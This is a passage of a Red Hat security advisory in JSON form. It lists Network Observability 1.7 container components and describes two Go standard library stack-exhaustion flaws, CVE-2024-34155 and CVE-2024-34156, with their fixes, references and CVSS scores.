"full_product_name": {
"name": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64"
},
"product_reference": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x"
},
"product_reference": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le"
},
"product_reference": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64"
},
"product_reference": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x"
},
"product_reference": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64"
},
"product_reference": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
},
"product_reference": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-34155",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2024-09-06T21:20:06.929766+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310527"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the go/parser package of the Golang standard library. Calling any Parse functions on Go source code containing deeply nested literals can cause a panic due to stack exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34155"
},
{
"category": "external",
"summary": "RHBZ#2310527",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310527"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34155",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34155"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34155",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34155"
},
{
"category": "external",
"summary": "https://go.dev/cl/611238",
"url": "https://go.dev/cl/611238"
},
{
"category": "external",
"summary": "https://go.dev/issue/69138",
"url": "https://go.dev/issue/69138"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3105",
"url": "https://pkg.go.dev/vuln/GO-2024-3105"
}
],
"release_date": "2024-09-06T21:15:11.947000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion"
},
{
"cve": "CVE-2024-34156",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2024-09-06T21:20:09.377905+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310528"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the encoding/gob package of the Golang standard library. Calling Decoder.Decoding, a message that contains deeply nested structures, can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in Go\u0027s `encoding/gob` package is of high severity because it exposes applications to potential Denial of Service (DoS) attacks through stack exhaustion. Since `gob` relies on recursive function calls to decode nested structures, an attacker could exploit this by sending crafted messages with excessively deep nesting, causing the application to panic due to stack overflow. This risk is particularly important in scenarios where untrusted or external input is processed, as it can lead to system unavailability or crashes, undermining the reliability and availability of services.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
